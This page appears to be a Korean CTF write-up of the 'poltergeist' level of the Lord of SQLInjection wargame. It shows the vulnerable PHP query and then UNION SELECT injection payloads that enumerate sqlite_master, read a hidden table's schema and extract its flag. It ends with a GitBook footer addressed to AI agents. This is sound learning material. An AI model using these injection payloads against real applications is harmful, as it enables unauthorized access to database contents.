> For the complete documentation index, see [llms.txt](https://docs.cooku222.kr/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.cooku222.kr/security/web-hacking/lord-of-sql-injection/lord-of-sqlinjection-poltergeist.md).

# \[Lord Of SQLInjection] poltergeist

<figure><img src="https://blog.kakaocdn.net/dna/KOZOT/btsNDsnSc7f/AAAAAAAAAAAAAAAAAAAAAMo-Rb1meHxcCF1FZkWoJZBOMxbiQyuGFl6jGEoSgi7M/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=2ske9L4PxNAvU2f1rI0ej06PmvU%3D" alt="" height="267" width="1124"><figcaption></figcaption></figure>

#### 코드 분석

```
$query = "select id from member where id='admin' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = sqlite_fetch_array(sqlite_query($db,$query));
if($result['id']) echo "<h2>Hello {$result['id']}</h2>";
```

\- id='admin' and pw='공격 백터 pw'인 member 변수에 저장된 id을 반환하는 쿼리문\
\- 만약 쿼리문 반환 값이 있다면, hello 반환 값을 페이지에 출력

```
if($poltergeistFlag === $_GET['pw']) solve("poltergeist");
// Flag is in `flag_{$hash}` table, not in `member` table. Let's look over whole of the database.
```

\- $poltergeistFlag은flag\_{$hash}로 되어있는 테이블에 저장\
&#x20;

#### 문제 풀이

\- union select 이용

```
[URL]?pw=' UNION SELECT tbl_name FROM sqlite_master--
```

<figure><img src="https://blog.kakaocdn.net/dna/vRQJd/btsNC9B6qWv/AAAAAAAAAAAAAAAAAAAAAGaIJNH4rq4R_EahU0jJ_2Pa_S_O1uVs_1hr41Jm9ciJ/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=sqUp%2BGHFHoVWFWFy1bnV%2FgmEbsQ%3D" alt="" height="335" width="1123"><figcaption></figcaption></figure>

```
[URL]?pw=' UNION SELECT sql FROM sqlite_master WHERE tbl_name='flag_70c81d99'--
```

<figure><img src="https://blog.kakaocdn.net/dna/cYCgd2/btsNEMexv98/AAAAAAAAAAAAAAAAAAAAAAxVNJTtRWBplOrY2f_8fkTyDcrUj6r8i-0XUV2bUtk3/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=Lg6nEZ5psI5HKgolG1pnuMa9nhY%3D" alt="" height="341" width="1121"><figcaption></figcaption></figure>

```
[URL]?pw=' UNION SELECT flag_0876285c FROM flag_70c81d99--
```

<figure><img src="https://blog.kakaocdn.net/dna/Qv9Z2/btsNDP37BRk/AAAAAAAAAAAAAAAAAAAAACoMp9ZieEpe9byPcvIk9LnmEABPy1JVnLpiwkBVvFrp/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=6G084PTU0CSX4b0y264t%2F%2BN%2FpDU%3D" alt="" height="333" width="1119"><figcaption></figcaption></figure>

```
[URL]?pw=FLAG{ea5d3bbdcc4aec9abe4a6a9f66eaaa13} #위에서 취득한 플래그 값 삽입해서 클리어 얻음
```

<figure><img src="https://blog.kakaocdn.net/dna/lorZG/btsNCwqKqQ6/AAAAAAAAAAAAAAAAAAAAAJFC6MR2mSh9E3mAxq8o9SUPl4kg9wOGcVq05jDqUbJG/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=YwdT1umfr%2BMH3x%2BOnQULfMnSGBQ%3D" alt="" height="405" width="1112"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.cooku222.kr/security/web-hacking/lord-of-sql-injection/lord-of-sqlinjection-poltergeist.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.